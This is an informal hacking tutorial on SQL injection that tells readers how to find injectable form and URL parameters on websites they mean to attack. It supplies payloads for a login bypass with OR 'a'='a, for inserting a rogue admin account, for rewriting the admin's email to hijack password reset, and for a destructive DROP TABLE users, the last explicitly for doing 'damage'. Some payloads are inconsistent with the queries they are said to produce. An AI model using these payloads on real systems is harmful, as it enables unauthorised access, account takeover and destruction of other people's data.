SQL injections As many of you have heard about SQL injection, and you don't want to read those long articles.
So I am going to explain it to you as clearly as possible. -What is SQL injection? 
SQL injection is when you are able to trick the server and inserting your own SQL queries. 
This is commonly used in forms and by the URL. For instance when you submit data through a form most of the time it makes a query 
and submits it to the database. So if you could only trick it and insert your SQL query, that is what SQL injection is all about.
 -What is it used for? Its mainly used to give or get things for you. With some common lines; There are some cases where you just
 mess the whole database and the website you were going to attack screws up, and your luck is over until the administrators fix it.
 But some times you will get your injected SQL query to work and for example you would get administrator privileges or change some 
information. -Where can I find these vulnerabilities? You should always look in the source of the website you want to inject your 
query, you should look at where the form is going to for example <form action='some_page.php?id=24' method='GET'> One thing you need
 to know perfectly is the difference between POST and GET. The method POST makes the form submit the information hidden, and the 
method GET makes the form submit the information that will appear on the URL. So what do you mean by POST-hidden and GET-displayed 
on the URL? In some websites you will see that when you submit a poll entry or something similar using method GET. The URL would look
 like: index.php?action=add&where=poll&entry=1 This will look like if you are using the GET method. And the POST method is the exact 
opposite. So lets get back to where you should find them, so when you look at the source you will see that the value of the 
action="some_page.php?id=24" is some_page.php?id=24, take this and put on the URL, now you will have something like this: 
Address: http://www.somesite.com/search/index.php?id=24 To test if this is vulnerable just add a ' at the end like: 
http://www.somesite.com/search/index.php?id=24' If this gives you an error then it means that there is a chance that the 
page might be vulnerable. Here are some examples http://www.somesite.com/search/index.php?id=24' or 1=1-- How does a vulnerable 
code look like? and how could I inject it? Ok lets take a look at a common login system vulnerability error. Here is the code/script:
 SELECT * FROM users WHERE username = '$info' AND password='$pass'; Here the variable $info is the data that the user submitted 
[some_page.php?action=login&info=grindordie&pass=bahbah] so lets say that you know how the code looks like when you are attacking 
a site, so you managed to change it to something like this: some_page.php?action=login&info=grindordie_admin' OR 'a'='a&pass=bahbah' OR
 'a'='a Why does 'a'='a doesn't end with a ' ? Because the ' is at the end of the original code. SELECT * FROM users WHERE 
username = '$info ' AND password='$pass '; Ok I get this, but how would the code look like? SELECT * FROM users WHERE username 
= 'grindordie_admin' OR 'a'='a' AND password='test' OR 'a'='a'; 






	But this is still checking the username and password right? Yes, but its saying "if the username is equal to 
grindordie_admin or a" Why a and not a=a? Because its saying that a is equal to a, so it doesn't check the database for a
 value match, because you are already giving it. OK I got this but as you said how can I give my self admin privileges or 
change something? Well, to make a new user on a database you should know the names of the table and rows. for example 
SELECT * FROM users WHERE username = '$info'; All you have to do is some_page.php?action=login&info=ha'; INSERT INTO table 
(user_id, username, passwords, email, admin) VALUES('666', 'Grindordie', 'bahbah', 'grindordie@gmail.com','yes');-- code would
 look like SELECT * FROM users WHERE username = 'ha'; INSERT INTO table (user_id, username, passwords, admin) VALUES
('1', 'Grindordie', 'bahbah', 'yes' );--'; Of course you might not be successful in the first attacks, and sometimes 
the INSERT command is allowed in that table, the names for the rows might be wrong, and alot of other things might stop 
you from injecting. Now lets see how can you change/delete stuff Lets say you want to hack the "forgot password" feature.
 So you found a place where you can inject SQL and you should do the following some_page.php?action=login&info=grindordie';
 UPDATE table SET email='grindordie@gmail.com' WHERE userid='1 SELECT * FROM users WHERE username = 'grindordie'; UPDATE 
table SET email='grindordie@gmail.com' WHERE userid='1'; Now this changes the email that was set for user id 1 
(its mostly admin's USER ID) and you would go to the forgot password feature and email yourself the admin password. 
If you are a blackhat or you would like to do some damage you can always drop the table. 
SELECT * FROM users WHERE username = '$info'; some_page.php?action=login&info=some_fake_name'; DROP TABLE users; -- 
and the code would look like SELECT * FROM users WHERE username = 'some_fake_name'; DROP TABLE users; --'; 
And there you go, now there is no more table named users.



GrindorDie
